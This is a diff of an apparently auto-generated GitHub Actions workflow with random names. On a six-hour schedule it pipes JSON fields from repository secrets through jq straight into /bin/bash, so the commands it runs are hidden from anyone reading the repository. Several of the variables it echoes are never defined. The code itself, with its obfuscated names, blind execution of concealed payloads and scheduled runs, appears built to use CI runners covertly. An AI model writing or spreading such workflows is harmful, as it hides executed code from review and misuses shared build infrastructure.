--- a/.github/workflows/meibaodi4317.yml
+++ b/.github/workflows/meibaodi4317.yml
@@ -2,27 +2,22 @@ name: meibaodi4317
 on:
   workflow_dispatch:
   schedule:
-    - cron: '16 2/6 * * *'
-
-jobs:  # 1688
+    - cron: '50 1/6 * * *'
+jobs:
   build:
     runs-on: ubuntu-latest
+
     steps:
       - uses: actions/checkout@v4
       - name: meibaodi4317
         env:
-          ui2: ${{ secrets.ui2 }}
+          x64209: ${{ secrets.x64209 }}
         run: |
-          echo $ui2 | jq -r .cv12678 | /bin/bash
-          echo $hmwag9590 | jq -r .gq280 | /bin/bash
-          echo $fac788 | jq -r .xqoyu47246 | /bin/bash
-          echo $qscw61468 | jq -r .ue45133 | /bin/bash
-          echo $olp7 | jq -r .pev676 | /bin/bash
-          echo $c5492 | jq -r .jgc07 | /bin/bash
-          echo $tjp82 | jq -r .xtn2468 | /bin/bash
-          echo $u92 | jq -r .fa8705 | /bin/bash
-          echo $xww4691 | jq -r .wrw1124 | /bin/bash
-          echo $wbqmi50075 | jq -r .hcm6 | /bin/bash
-          echo $f70202 | jq -r .m5818 | /bin/bash
-          echo $w9818 | jq -r .kwkij3 | /bin/bash
+          echo $x64209 | jq -r .htlng965 | /bin/bash
+          echo $js9506 | jq -r .krwd032 | /bin/bash
+          echo $lz64803 | jq -r .oixii074 | /bin/bash
+          echo $l8812 | jq -r .kzp655 | /bin/bash
+          echo $ygp2179 | jq -r .enepr505 | /bin/bash
+          echo $w93838 | jq -r .cqx7 | /bin/bash
+          echo $va39 | jq -r .hfldz1665 | /bin/bash
 
